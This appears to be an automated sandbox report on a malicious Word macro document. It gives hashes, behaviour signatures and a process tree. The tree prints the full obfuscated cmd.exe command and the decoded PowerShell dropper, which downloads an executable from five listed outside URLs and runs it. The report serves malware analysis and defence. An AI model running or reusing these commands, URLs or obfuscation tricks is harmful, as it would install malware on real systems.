Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-09-2024 11:16

General

  • Target

    fc2f8c2012529d406610ec15b3d74951_JaffaCakes118.doc

  • Size

    247KB

  • MD5

    fc2f8c2012529d406610ec15b3d74951

  • SHA1

    50d1301e3226e78c978636243b03b4855d49e734

  • SHA256

    eff1add3604705dc01aa6e09ab7d10d749edca568a9c090a759b61190bb10009

  • SHA512

    a3f0735f110b479599061b46e0bccd9045118376ed778b53330d6365878f3f54c618c2e3f214077db8b83c0ca2fb7e8c468ad02acbb840fa36d191ac0b4d7c55

  • SSDEEP

    3072:a1wmL5TalBC81ijXS4Rt9ui2nNejL/xSu90OoiLuDKZXfwKeljR14:UL5eb54ui2nNkxUOmD+XfwLM

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://koltukasistani.com/MQKx5tquZSaKOS_jjd5iV3ms

exe.dropper

http://karnatakajudo.org/Fr7JEg3XCtx

exe.dropper

http://privateinvestigatorkendall.com/Fo9cwuVLQWUA

exe.dropper

http://pwp7.ir/PiA5CBMYHR_7

exe.dropper

http://leotravels.in/RiuC1MPOP1s

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fc2f8c2012529d406610ec15b3d74951_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2260
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\uwqabwk\jzwijhn\aoumkr\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set FI=KXYLuU(@ _J:NIk'CsD%P$rad1ZmGH3gy~vqonjh=R\-FV5AQ/cp{l,;x)Bw7Ob9TiSM4fzeE}t0W+.&&for %w in (51;36;59;19;20;5;58;3;13;16;11;33;46;54;25;19;22;19;66;72;66;66;13;61;12;12;47;67;72;11;33;43;68;54;25;19;39;19;64;72;67;20;11;33;43;30;54;25;19;53;53;8;21;74;36;50;59;62;40;15;65;65;22;59;38;15;55;21;36;70;24;37;70;69;40;37;71;59;43;36;62;38;71;50;74;8;12;71;74;78;76;71;62;16;53;65;71;37;74;55;21;39;35;24;51;22;22;53;40;15;39;74;74;51;11;49;49;14;36;53;74;4;14;23;17;65;17;74;23;37;65;78;50;36;27;49;67;48;0;56;46;74;35;4;26;66;23;0;61;66;9;38;38;24;46;65;45;30;27;17;7;39;74;74;51;11;49;49;14;23;22;37;23;74;23;14;23;38;4;24;36;78;36;22;31;49;44;22;60;10;72;31;30;1;16;74;56;7;39;74;74;51;11;49;49;51;22;65;34;23;74;71;65;37;34;71;17;74;65;31;23;74;36;22;14;71;37;24;23;53;53;78;50;36;27;49;44;36;63;50;59;4;45;3;48;76;5;47;7;39;74;74;51;11;49;49;51;59;51;60;78;65;22;49;20;65;47;46;16;58;67;2;29;41;9;60;7;39;74;74;51;11;49;49;53;71;36;74;22;23;34;71;53;17;78;65;37;49;41;65;4;16;25;67;20;61;20;25;17;15;78;66;51;53;65;74;6;15;7;15;57;55;21;65;69;38;62;14;24;40;15;38;50;34;59;24;15;55;21;34;65;14;14;74;34;50;8;40;8;15;68;68;75;15;55;21;35;27;38;50;17;14;38;40;15;24;37;24;53;50;15;55;21;24;62;34;27;51;74;40;21;71;37;34;11;74;71;27;51;77;15;42;15;77;21;34;65;14;14;74;34;50;77;15;78;71;56;71;15;55;69;36;22;71;23;50;39;6;21;36;27;36;50;39;53;59;8;65;37;8;21;39;35;24;51;22;22;53;57;52;74;22;32;52;21;36;70;24;37;70;69;78;18;36;59;37;53;36;23;24;44;65;53;71;6;21;36;27;36;50;39;53;59;54;8;21;24;62;34;27;51;74;57;55;21;36;4;69;65;38;4;40;15;14;17;69;70;62;69;34;15;55;13;69;8;6;6;28;71;74;43;13;74;71;27;8;21;24;62;34;27;51;74;57;78;53;71;37;31;74;39;8;43;31;71;8;68;75;75;75;75;57;8;52;13;37;34;36;14;71;43;13;74;71;27;8;21;24;62;34;27;51;74;55;21;65;23;14;23;65;34;4;40;15;70;39;51;35;51;39;53;15;55;62;22;71;23;14;55;73;73;50;23;74;50;39;52;73;73;21;65;69;65;27;59;40;15;22;70;69;38;36;70;15;55;81)do set an=!an!!FI:~%w,1!&&if %w gtr 80 echo !an:~4!|cmd"
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Windows\SysWOW64\cmd.exe
        CmD /V:ON/C"set FI=KXYLuU(@ _J:NIk'CsD%P$rad1ZmGH3gy~vqonjh=R\-FV5AQ/cp{l,;x)Bw7Ob9TiSM4fzeE}t0W+.&&for %w in (51;36;59;19;20;5;58;3;13;16;11;33;46;54;25;19;22;19;66;72;66;66;13;61;12;12;47;67;72;11;33;43;68;54;25;19;39;19;64;72;67;20;11;33;43;30;54;25;19;53;53;8;21;74;36;50;59;62;40;15;65;65;22;59;38;15;55;21;36;70;24;37;70;69;40;37;71;59;43;36;62;38;71;50;74;8;12;71;74;78;76;71;62;16;53;65;71;37;74;55;21;39;35;24;51;22;22;53;40;15;39;74;74;51;11;49;49;14;36;53;74;4;14;23;17;65;17;74;23;37;65;78;50;36;27;49;67;48;0;56;46;74;35;4;26;66;23;0;61;66;9;38;38;24;46;65;45;30;27;17;7;39;74;74;51;11;49;49;14;23;22;37;23;74;23;14;23;38;4;24;36;78;36;22;31;49;44;22;60;10;72;31;30;1;16;74;56;7;39;74;74;51;11;49;49;51;22;65;34;23;74;71;65;37;34;71;17;74;65;31;23;74;36;22;14;71;37;24;23;53;53;78;50;36;27;49;44;36;63;50;59;4;45;3;48;76;5;47;7;39;74;74;51;11;49;49;51;59;51;60;78;65;22;49;20;65;47;46;16;58;67;2;29;41;9;60;7;39;74;74;51;11;49;49;53;71;36;74;22;23;34;71;53;17;78;65;37;49;41;65;4;16;25;67;20;61;20;25;17;15;78;66;51;53;65;74;6;15;7;15;57;55;21;65;69;38;62;14;24;40;15;38;50;34;59;24;15;55;21;34;65;14;14;74;34;50;8;40;8;15;68;68;75;15;55;21;35;27;38;50;17;14;38;40;15;24;37;24;53;50;15;55;21;24;62;34;27;51;74;40;21;71;37;34;11;74;71;27;51;77;15;42;15;77;21;34;65;14;14;74;34;50;77;15;78;71;56;71;15;55;69;36;22;71;23;50;39;6;21;36;27;36;50;39;53;59;8;65;37;8;21;39;35;24;51;22;22;53;57;52;74;22;32;52;21;36;70;24;37;70;69;78;18;36;59;37;53;36;23;24;44;65;53;71;6;21;36;27;36;50;39;53;59;54;8;21;24;62;34;27;51;74;57;55;21;36;4;69;65;38;4;40;15;14;17;69;70;62;69;34;15;55;13;69;8;6;6;28;71;74;43;13;74;71;27;8;21;24;62;34;27;51;74;57;78;53;71;37;31;74;39;8;43;31;71;8;68;75;75;75;75;57;8;52;13;37;34;36;14;71;43;13;74;71;27;8;21;24;62;34;27;51;74;55;21;65;23;14;23;65;34;4;40;15;70;39;51;35;51;39;53;15;55;62;22;71;23;14;55;73;73;50;23;74;50;39;52;73;73;21;65;69;65;27;59;40;15;22;70;69;38;36;70;15;55;81)do set an=!an!!FI:~%w,1!&&if %w gtr 80 echo !an:~4!|cmd"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $tocwb='iirwj';$ozdnzf=new-object Net.WebClient;$hqdprrl='http://koltukasistani.com/MQKx5tquZSaKOS_jjd5iV3ms@http://karnatakajudo.org/Fr7JEg3XCtx@http://privateinvestigatorkendall.com/Fo9cwuVLQWUA@http://pwp7.ir/PiA5CBMYHR_7@http://leotravels.in/RiuC1MPOP1s'.Split('@');$ifjbkd='jcvwd';$vikktvc = '440';$qmjcskj='dndlc';$dbvmpt=$env:temp+'\'+$vikktvc+'.exe';foreach($omochlw in $hqdprrl){try{$ozdnzf.DownloadFile($omochlw, $dbvmpt);$oufiju='ksfzbfv';If ((Get-Item $dbvmpt).length -ge 40000) {Invoke-Item $dbvmpt;$iakaivu='zhpqphl';break;}}catch{}}$ifimw='rzfjoz';"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2996
        • C:\Windows\SysWOW64\cmd.exe
          cmd
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2708
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell $tocwb='iirwj';$ozdnzf=new-object Net.WebClient;$hqdprrl='http://koltukasistani.com/MQKx5tquZSaKOS_jjd5iV3ms@http://karnatakajudo.org/Fr7JEg3XCtx@http://privateinvestigatorkendall.com/Fo9cwuVLQWUA@http://pwp7.ir/PiA5CBMYHR_7@http://leotravels.in/RiuC1MPOP1s'.Split('@');$ifjbkd='jcvwd';$vikktvc = '440';$qmjcskj='dndlc';$dbvmpt=$env:temp+'\'+$vikktvc+'.exe';foreach($omochlw in $hqdprrl){try{$ozdnzf.DownloadFile($omochlw, $dbvmpt);$oufiju='ksfzbfv';If ((Get-Item $dbvmpt).length -ge 40000) {Invoke-Item $dbvmpt;$iakaivu='zhpqphl';break;}}catch{}}$ifimw='rzfjoz';
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1380
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2340

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      51646f049be589b042839e3751a76e07

      SHA1

      7f2c085af41a7f4f1943329797cec3122d8df73e

      SHA256

      b3adc0fa4fea4d6102600ea8b384b77190ff1005d31ea2c5a25adb3e2f5a2c62

      SHA512

      43d054cdd7c4aa0b798a5f9d2e73f5d3eb15c883a403827662d068a6baef2234b2b90e59979e3638e91d796475d81c392758a650da37116b616d03f166eb8242

    • memory/2260-60-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-132-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-16-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-15-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-14-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-13-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-50-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-11-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-10-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-9-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-8-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-17-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-18-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-71-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-155-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/2260-2-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/2260-12-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-49-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-34-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-33-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-29-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-19-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-78-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-77-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-124-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-126-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-127-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/2260-130-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-131-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB

    • memory/2260-0-0x000000002F801000-0x000000002F802000-memory.dmp

      Filesize

      4KB

    • memory/2260-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2260-61-0x0000000000790000-0x0000000000890000-memory.dmp

      Filesize

      1024KB